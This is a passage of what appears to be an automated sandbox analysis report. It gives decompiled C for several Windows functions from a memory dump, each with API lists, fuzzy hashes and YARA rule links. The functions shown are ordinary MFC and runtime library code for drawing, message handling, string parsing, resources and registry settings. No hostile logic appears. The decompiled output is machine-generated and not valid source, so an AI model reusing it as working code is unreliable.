					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E0040E903(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E0040E410( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E0040D3B7();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
						E0040E956(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E0040D3B7();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x4361d8;
					E0040E956(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E0041F7C2(_t53);
			}

APIs

__EH_prolog3.LIBCMT ref: 00415217

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetDC.USER32(?), ref: 00415295
IntersectRect.USER32 ref: 004152CF
CreateRectRgnIndirect.GDI32(?), ref: 004152D9

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
String ID:
API String ID: 2872313494-0
Opcode ID: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
Instruction ID: 57a31d86cf499e8c3f284dac0a6a6315687b59808bb24555e4edea15a439fa37
Opcode Fuzzy Hash: 506e79158975ac838f48e3fec4624e35c69e0d7bb44190366a378939756601cf
Instruction Fuzzy Hash: 4B316071D0021ADFCF01DFA4C485ADEBB74AF58314F10846AE911BB191C7B85A85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8AF, Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0041D8AF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E0041F6EA(E004338B2, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E0040DBE0(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E0040D3B7();
						}
						L17:
						return E0041F7C2(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E0040D3B7();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 0041D8B6
PeekMessageA.USER32 ref: 0041D910
PeekMessageA.USER32 ref: 0041D927
PeekMessageA.USER32 ref: 0041D961

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
Instruction ID: 1d58d31dcb184bdaff623e44cde678fc4dd054cac071c02b76d39c172b6b99e5
Opcode Fuzzy Hash: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
Instruction Fuzzy Hash: 323171F1A10309ABDB209FA0DD85EAE77B8BF04714F00062EB552A62D1D778AA40CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00411917, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00411917(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x443590; // 0x8ffedb05
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E004223D4(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E004223D4( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E00422304( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E00422215();
						} else {
							_t23 = E004221EC();
						}
						L17:
						return E0041E5DF(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}

APIs

CharNextA.USER32(?), ref: 0041196E

Part of subcall function 004223D4: __ismbcspace_l.LIBCMT ref: 004223DA

CharNextA.USER32(00000000), ref: 0041198B
_strtol.LIBCMT ref: 004119B6
_strtoul.LIBCMT ref: 004119BD

Part of subcall function 00422215: strtoxl.LIBCMT ref: 00422235

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
Instruction ID: 8c4b41d3fbd90daf78a1bc0d05ccb98cb6085a6a9126d8b84ccc100fad1095ed
Opcode Fuzzy Hash: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
Instruction Fuzzy Hash: 8E2135B1610154ABCB20DB758C51BEA77E89F59354F10006BEBA0D3151DBBC8EC0CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00416835, Relevance: 6.1, APIs: 4, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00416835(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E004167D2( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

APIs

SafeArrayDestroy.OLEAUT32 ref: 00416856
CoTaskMemFree.OLE32(?), ref: 004168D9

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
Instruction ID: 9c91db5bcdb4501a342168245182f2762e241240caaa57732c86d6e759acce40
Opcode Fuzzy Hash: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
Instruction Fuzzy Hash: 7B119A305012059BDF246F65D848BE77764FF00391B16442AF855D6250C739DD8ADB58

Uniqueness

Uniqueness Score: -1.00%

Function 004153F4, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004153F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E0041F6EA(E00432EB7, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x436aa8;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E0040DBE0(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E0040E8F5(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E0040D3B7();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x4361d8;
						E0040E956(_t64 - 0x1c);
						return E0041F7C2(_t55);
					}
					_push(_t60);
					E00413FBC( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E0040D3B7();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}

APIs

__EH_prolog3.LIBCMT ref: 004153FB
GetRgnBox.GDI32(?,?), ref: 00415476
IntersectRect.USER32 ref: 0041548B
EqualRect.USER32 ref: 00415499

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
Instruction ID: 673062383659f9e1f0083c5338fa9c7e27454a49a707c8e2040369ae72bcd230
Opcode Fuzzy Hash: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
Instruction Fuzzy Hash: 42212772D00209EBCF11EFA5C9809EEBB78BF48314F00856AE515A3251D7789A45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403115, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E00403115(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E0041F6EA(E00431B6F, __ebx, __edi, __esi);
				_t35 = E00402EE1(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E004030C0(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E0041F7F4( &_a4, 0x43c3a8);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E00402FE8(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

APIs

__EH_prolog3.LIBCMT ref: 0040311C

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

__CxxThrowException@8.LIBCMT ref: 00403152
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,0043C3A8,00000004,0040105C,8007000E), ref: 0040317B

Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8

LocalFree.KERNEL32(?), ref: 004031A4

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
Instruction ID: a0072123bbb8e88f97f6a2e598c50d444f9710c5a47a49e3e247eeb1caa48808
Opcode Fuzzy Hash: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
Instruction Fuzzy Hash: DE11C671604249AFDF00DFA4CC81DAE3BA9EB08354F10453AF925DA2E1D675DA51C758

Uniqueness

Uniqueness Score: -1.00%

Function 004060A2, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004060A2(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E0040DB94(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 004060C8
LoadResource.KERNEL32(?,00000000), ref: 004060D0
LockResource.KERNEL32(00000000), ref: 004060E2
FreeResource.KERNEL32(00000000), ref: 0040612C

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
Instruction ID: 40659096538afe78b8a2922fa92c0b5113ad7cc5d91cea190e6c9c4304d24e44
Opcode Fuzzy Hash: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
Instruction Fuzzy Hash: EE11BF30500712EBCB209FA5C848AABBBB4FF04355F11857AE84367691D378ED60D764

Uniqueness

Uniqueness Score: -1.00%

Function 004044BD, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E004044BD(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E0041F6EA(E00431C96, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E00404F70(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x435184;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E0041FD45( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E0040DB94(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E004037E3(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E00404129(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E0041F7C2(_t51);
			}

APIs

__EH_prolog3.LIBCMT ref: 004044C4

Part of subcall function 00404F70: __EH_prolog3.LIBCMT ref: 00404F77

__strdup.LIBCMT ref: 004044E6
GetCurrentThread.KERNEL32 ref: 00404513
GetCurrentThreadId.KERNEL32 ref: 0040451C

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
Instruction ID: 20f32028a5bae838525036816734f9698e3db64a09468b62decb6aeab759841c
Opcode Fuzzy Hash: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
Instruction Fuzzy Hash: 4521A4B0800B50CFC7219F2A854565AFBF4BFA4704F10892FD19A97B61DBB4A445DF08

Uniqueness

Uniqueness Score: -1.00%

Function 0040672A, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040672A(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x443590; // 0x8ffedb05
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E0041FC83( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E004066E4(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E0041E5DF(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00406763
RegCloseKey.ADVAPI32(00000000), ref: 0040676C
_swprintf.LIBCMT ref: 00406789
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040679A

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
Instruction ID: 21f77df2bb305b21e633773eb41cbea4057ecc6761c3a3b171915aab709e64d7
Opcode Fuzzy Hash: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
Instruction Fuzzy Hash: F001C476500209BBDB109F658C85FAF73BCAF48708F41083ABA01E7181DA78E91587A8

Uniqueness

Uniqueness Score: -1.00%

